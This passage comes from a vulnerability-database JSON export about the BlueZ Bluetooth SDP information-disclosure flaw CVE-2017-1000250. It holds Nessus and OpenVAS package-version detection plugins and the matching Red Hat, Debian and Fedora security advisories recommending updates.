reference:\"bluez-5.44-4.el7_4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bluez-cups-5.44-4.el7_4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bluez-hid2hci-5.44-4.el7_4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bluez-libs-5.44-4.el7_4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bluez-libs-devel-5.44-4.el7_4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bluez / bluez-alsa / bluez-compat / bluez-cups / bluez-gstreamer / etc\");\n}\n", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-06T09:14:40", "description": "An update for bluez is now available for Red Hat Enterprise Linux 6\nand Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe bluez packages contain the following utilities for use in\nBluetooth applications: hcitool, hciattach, hciconfig, bluetoothd,\nl2ping, start scripts (Red Hat), and pcmcia configuration files.\n\nSecurity Fix(es) :\n\n* An information-disclosure flaw was found in the bluetoothd\nimplementation of the Service Discovery Protocol (SDP). A specially\ncrafted Bluetooth device could, without prior pairing or user\ninteraction, retrieve portions of the bluetoothd process memory,\nincluding potentially sensitive information such as Bluetooth\nencryption keys. 
(CVE-2017-1000250)\n\nRed Hat would like to thank Armis Labs for reporting this issue.\n\nNote that Tenable Network Security has attempted to extract the\npreceding description block directly from the corresponding Red Hat\nsecurity advisory. Virtuozzo provides no description for VZLSA\nadvisories. Tenable has attempted to automatically clean and format\nit as much as possible without introducing additional issues.", "edition": 14, "cvss3": {"score": 6.5, "vector": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2018-11-27T00:00:00", "title": "Virtuozzo 6 : bluez / bluez-alsa / bluez-compat / bluez-cups / etc (VZLSA-2017-2685)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000250"], "modified": "2018-11-27T00:00:00", "cpe": ["p-cpe:/a:virtuozzo:virtuozzo:bluez", "p-cpe:/a:virtuozzo:virtuozzo:bluez-cups", "p-cpe:/a:virtuozzo:virtuozzo:bluez-libs-devel", "p-cpe:/a:virtuozzo:virtuozzo:bluez-compat", "p-cpe:/a:virtuozzo:virtuozzo:bluez-gstreamer", "cpe:/o:virtuozzo:virtuozzo:6", "p-cpe:/a:virtuozzo:virtuozzo:bluez-alsa", "p-cpe:/a:virtuozzo:virtuozzo:bluez-libs"], "id": "VIRTUOZZO_VZLSA-2017-2685.NASL", "href": "https://www.tenable.com/plugins/nessus/119224", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(119224);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\n \"CVE-2017-1000250\"\n );\n\n script_name(english:\"Virtuozzo 6 : bluez / bluez-alsa / bluez-compat / bluez-cups / etc (VZLSA-2017-2685)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for bluez is now available for Red Hat Enterprise Linux 
6\nand Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe bluez packages contain the following utilities for use in\nBluetooth applications: hcitool, hciattach, hciconfig, bluetoothd,\nl2ping, start scripts (Red Hat), and pcmcia configuration files.\n\nSecurity Fix(es) :\n\n* An information-disclosure flaw was found in the bluetoothd\nimplementation of the Service Discovery Protocol (SDP). A specially\ncrafted Bluetooth device could, without prior pairing or user\ninteraction, retrieve portions of the bluetoothd process memory,\nincluding potentially sensitive information such as Bluetooth\nencryption keys. (CVE-2017-1000250)\n\nRed Hat would like to thank Armis Labs for reporting this issue.\n\nNote that Tenable Network Security has attempted to extract the\npreceding description block directly from the corresponding Red Hat\nsecurity advisory. Virtuozzo provides no description for VZLSA\nadvisories. 
Tenable has attempted to automatically clean and format\nit as much as possible without introducing additional issues.\");\n # http://repo.virtuozzo.com/vzlinux/announcements/json/VZLSA-2017-2685.json\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?26b736f1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2017:2685\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bluez / bluez-alsa / bluez-compat / bluez-cups / etc package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/11/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:bluez\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:bluez-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:bluez-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:bluez-cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:bluez-gstreamer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:bluez-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:bluez-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 6.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nflag = 0;\n\npkgs = [\"bluez-4.66-2.vl6\",\n \"bluez-alsa-4.66-2.vl6\",\n \"bluez-compat-4.66-2.vl6\",\n \"bluez-cups-4.66-2.vl6\",\n \"bluez-gstreamer-4.66-2.vl6\",\n \"bluez-libs-4.66-2.vl6\",\n \"bluez-libs-devel-4.66-2.vl6\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"Virtuozzo-6\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bluez / bluez-alsa / bluez-compat / bluez-cups / etc\");\n}\n", "cvss": {"score": 
3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-12T09:38:39", "description": "The SDP server in BlueZ is vulnerable to an information disclosure\nvulnerability which allows remote attackers to obtain sensitive\ninformation from the bluetoothd process memory. This vulnerability\nlies in the processing of SDP search attribute requests.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n4.99-2+deb7u1.\n\nWe recommend that you upgrade your bluez packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 17, "cvss3": {"score": 6.5, "vector": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-09-22T00:00:00", "title": "Debian DLA-1103-1 : bluez security update (BlueBorne)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000250"], "modified": "2017-09-22T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:bluez", "p-cpe:/a:debian:debian_linux:libbluetooth-dev", "p-cpe:/a:debian:debian_linux:bluez-cups", "p-cpe:/a:debian:debian_linux:bluez-gstreamer", "p-cpe:/a:debian:debian_linux:bluez-pcmcia-support", "p-cpe:/a:debian:debian_linux:bluez-utils", "p-cpe:/a:debian:debian_linux:libbluetooth3-dbg", "p-cpe:/a:debian:debian_linux:bluez-compat", "p-cpe:/a:debian:debian_linux:libbluetooth3", "p-cpe:/a:debian:debian_linux:bluez-dbg", "cpe:/o:debian:debian_linux:7.0", "p-cpe:/a:debian:debian_linux:bluetooth", "p-cpe:/a:debian:debian_linux:bluez-audio", "p-cpe:/a:debian:debian_linux:bluez-alsa"], "id": "DEBIAN_DLA-1103.NASL", "href": "https://www.tenable.com/plugins/nessus/103390", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1103-1. 
The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103390);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-1000250\");\n\n script_name(english:\"Debian DLA-1103-1 : bluez security update (BlueBorne)\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SDP server in BlueZ is vulnerable to an information disclosure\nvulnerability which allows remote attackers to obtain sensitive\ninformation from the bluetoothd process memory. This vulnerability\nlies in the processing of SDP search attribute requests.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n4.99-2+deb7u1.\n\nWe recommend that you upgrade your bluez packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2017/09/msg00020.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/bluez\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bluetooth\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bluez\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bluez-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bluez-audio\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bluez-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bluez-cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bluez-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bluez-gstreamer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bluez-pcmcia-support\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bluez-utils\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:debian:debian_linux:libbluetooth-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbluetooth3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbluetooth3-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/21\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"bluetooth\", reference:\"4.99-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bluez\", reference:\"4.99-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bluez-alsa\", reference:\"4.99-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bluez-audio\", reference:\"4.99-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bluez-compat\", reference:\"4.99-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bluez-cups\", reference:\"4.99-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bluez-dbg\", reference:\"4.99-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", 
prefix:\"bluez-gstreamer\", reference:\"4.99-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bluez-pcmcia-support\", reference:\"4.99-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bluez-utils\", reference:\"4.99-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbluetooth-dev\", reference:\"4.99-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbluetooth3\", reference:\"4.99-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbluetooth3-dbg\", reference:\"4.99-2+deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:deb_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-07T10:11:36", "description": "Security fix for CVE-2017-1000250\n\n----\n\n - This update adds support for cable pairing for\n PlayStation 3 and 4 controllers.\n\n - Add scripts to automatically btattach serial-port / uart\n connected Broadcom HCIs found on some Atom based x86\n hardware\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 17, "cvss3": {"score": 6.5, "vector": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2018-01-15T00:00:00", "title": "Fedora 27 : bluez (2017-77f991e537) (BlueBorne)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000250"], "modified": "2018-01-15T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:bluez", "cpe:/o:fedoraproject:fedora:27"], "id": "FEDORA_2017-77F991E537.NASL", "href": "https://www.tenable.com/plugins/nessus/105904", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# 
extracted from Fedora Security Advisory FEDORA-2017-77f991e537.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105904);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000250\");\n script_xref(name:\"FEDORA\", value:\"2017-77f991e537\");\n\n script_name(english:\"Fedora 27 : bluez (2017-77f991e537) (BlueBorne)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2017-1000250\n\n----\n\n - This update adds support for cable pairing for\n PlayStation 3 and 4 controllers.\n\n - Add scripts to automatically btattach serial-port / uart\n connected Broadcom HCIs found on some Atom based x86\n hardware\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-77f991e537\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bluez package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bluez\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/12\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/15\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"bluez-5.46-6.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bluez\");\n}\n", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}], "redhat": [{"lastseen": "2019-08-13T18:46:53", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000250"], "description": "The bluez packages contain the following utilities for use in Bluetooth applications: hcitool, hciattach, hciconfig, bluetoothd, l2ping, start scripts (Red Hat), and pcmcia configuration files.\n\nSecurity Fix(es):\n\n* An information-disclosure flaw was found in the bluetoothd implementation of the Service Discovery Protocol (SDP). A specially crafted Bluetooth device could, without prior pairing or user interaction, retrieve portions of the bluetoothd process memory, including potentially sensitive information such as Bluetooth encryption keys. 
(CVE-2017-1000250)\n\nRed Hat would like to thank Armis Labs for reporting this issue.", "modified": "2018-06-07T18:22:24", "published": "2017-09-12T18:08:48", "id": "RHSA-2017:2685", "href": "https://access.redhat.com/errata/RHSA-2017:2685", "type": "redhat", "title": "(RHSA-2017:2685) Moderate: bluez security update", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}], "debian": [{"lastseen": "2020-08-12T01:01:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000250"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3972-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nSeptember 13, 2017 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : bluez\nCVE ID : CVE-2017-1000250\nDebian Bug : 875633\n\nAn information disclosure vulnerability was discovered in the Service\nDiscovery Protocol (SDP) in bluetoothd, allowing a proximate attacker to\nobtain sensitive information from bluetoothd process memory, including\nBluetooth encryption keys.\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 5.23-2+deb8u1.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 5.43-2+deb9u1.\n\nWe recommend that you upgrade your bluez packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 11, "modified": "2017-09-13T11:54:19", "published": "2017-09-13T11:54:19", "id": "DEBIAN:DSA-3972-1:ACF5D", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2017/msg00234.html", "title": "[SECURITY] [DSA 3972-1] bluez security update", "type": "debian", "cvss": {"score": 3.3, "vector": 
"AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-30T02:23:01", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000250"], "description": "Package : bluez\nVersion : 4.99-2+deb7u1\nCVE ID : CVE-2017-1000250\nDebian Bug : 875633\n\nThe SDP server in BlueZ is vulnerable to an information disclosure\nvulnerability which allows an unauthenticated attacker within Bluetooth\nradio range (no prior pairing or user interaction required) to obtain\nsensitive information from the bluetoothd process memory. This\nvulnerability lies in the processing of SDP search attribute requests.\n\nFor Debian 7 \"Wheezy\", this problem has been fixed in version\n4.99-2+deb7u1.\n\nWe recommend that you upgrade your bluez packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 3, "modified": "2017-09-21T21:01:41", "published": "2017-09-21T21:01:41", "id": "DEBIAN:DLA-1103-1:B4D85", "href": "https://lists.debian.org/debian-lts-announce/2017/debian-lts-announce-201709/msg00020.html", "title": "[SECURITY] [DLA 1103-1] bluez security update", "type": "debian", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}], "openvas": [{"lastseen": "2019-05-29T18:34:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000250"], "description": "The remote host is missing an update for the 'bluez' package(s) announced via the referenced advisory.", "modified": "2018-11-23T00:00:00", "published": "2017-09-13T00:00:00", "id": "OPENVAS:1361412562310811768", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811768", "type": "openvas", "title": "RedHat Update for bluez RHSA-2017:2685-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_RHSA-2017_2685-01_bluez.nasl 12497 2018-11-23 08:28:21Z cfischer $\n#\n# RedHat Update for bluez RHSA-2017:2685-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This 
program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811768\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-09-13 07:15:51 +0200 (Wed, 13 Sep 2017)\");\n script_cve_id(\"CVE-2017-1000250\");\n script_tag(name:\"cvss_base\", value:\"3.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for bluez RHSA-2017:2685-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bluez'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The bluez packages contain the following\nutilities for use in Bluetooth applications: hcitool, hciattach, hciconfig,\nbluetoothd, l2ping, start scripts (Red Hat), and pcmcia configuration files.\n\nSecurity Fix(es):\n\n * An information-disclosure flaw was found in the bluetoothd implementation\nof the Service Discovery Protocol (SDP). 
A specially crafted Bluetooth\ndevice could, without prior pairing or user interaction, retrieve portions\nof the bluetoothd process memory, including potentially sensitive\ninformation such as Bluetooth encryption keys. (CVE-2017-1000250)\n\nRed Hat would like to thank Armis Labs for reporting this issue.\");\n script_tag(name:\"affected\", value:\"bluez on\n Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Server (v. 7),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2017:2685-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2017-September/msg00028.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", 